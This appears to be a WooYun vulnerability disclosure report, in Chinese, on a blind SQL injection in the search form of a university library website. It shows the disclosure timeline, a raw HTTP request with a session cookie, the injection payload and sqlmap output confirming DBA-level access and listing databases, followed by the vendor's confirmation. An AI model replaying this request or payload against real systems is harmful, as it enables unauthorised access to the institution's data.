乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-18: 细节已通知厂商并且等待厂商处理中 2015-11-20: 厂商已经确认,细节仅向厂商公开 2015-11-30: 细节向核心白帽子及相关领域专家公开 2015-12-10: 细节向普通白帽子公开 2015-12-20: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
RT
POST /Search.aspx HTTP/1.1Content-Length: 109Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://lib.henannu.edu.cnCookie: ASP.NET_SessionId=welwvv45okvndevwupffa155; CheckCode=7668; BAIDUID=3AE2F1C18FB020D854906EFEA0D0B4AB:FG=1Host: lib.henannu.edu.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*action=Add&AllCount=0¤tpage=0&guid=&name=*&pagesize= 100
name参数存在注入
sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* ((custom) POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: action=Add&AllCount=0¤tpage=0&guid=&name=%' AND 2009=2009 AND '%'='&pagesize= 100---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008current user is DBA: True
web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008available databases [7]:[*] master[*] model[*] msdb[*] New_sy_core_HeNanNormalUniversity[*] ReportServer[*] ReportServerTempDB[*] tempdb
跑的实在是太慢了,就不跑表了。DBA权限...你懂的
危害等级:中
漏洞Rank:8
确认时间:2015-11-20 09:39
感谢提醒,已经转给图书馆技术人员处理。
暂无